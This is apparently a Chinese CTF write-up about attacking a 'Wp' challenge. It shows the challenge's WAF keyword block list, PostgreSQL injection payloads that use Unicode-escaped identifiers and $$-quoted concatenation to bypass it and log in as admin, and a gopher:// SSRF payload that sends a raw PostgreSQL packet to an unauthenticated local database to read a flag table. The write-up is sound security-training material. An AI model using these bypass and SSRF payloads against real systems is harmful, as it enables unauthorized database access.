# Wp 访问login.php.bak 得到登录源码 ## Bypass waf 可以看到bypass了一些关键字 ``` reg|like|usern|pos|trim|having|admin|adm|select|update|drop|insert|where|union|set|from|chr|ord|ascii|or|and|substr|mid|concat|str|between|load|\*|<|>|\^|;|\.|\?|\\\|-|\)|\(| |~|!|@|\+|👴|👨|👦|coalesce|hex|conv|decode|pg|left|right|for|rep|load|glob|cast|to|limit|in|order ``` 想要登录到admin账户 ``` if($row['username']=="admin"){ $_SESSION['login'] = 1; echo "<script>window.location.href='dashboard.php';</script>"; } ``` 利用postgresql的一些trick ### 1、postgrSQL 编码+转译  https://www.postgresql.org/docs/9.2/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS-UESCAPE password `U&"$0075sername"UESCAPE'$',U&"$0073srf"UESCAPE'$'` 构造password ### 2、postgrSQL 字符串拼接 postgrSQL利用`||` 使得字符串拼接 利用`$$` 来将`a` `dmi` `n` 当成字符串 username `$$a$$||$$dmi$$||$$n$$` ## ssrf  发现ssrf 发现 5432 端口开启  postgresql未授权 本地搭建postgreSQL Wireshark 分析流量抓包  构造gopher ``` gopher://127.0.0.1:5432/_%00%00%00%20%00%03%00%00%75%73%65%72%00%63%74%66%00%64%61%74%61%62%61%73%65%00%66%6c%34%67%00%00%51%00%00%00%29%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%66%66%66%66%66%6c%6c%6c%6c%6c%61%61%61%61%61%67%67%67%67%67%67%3b%00%58%00%00%00%04 ``` 注意编码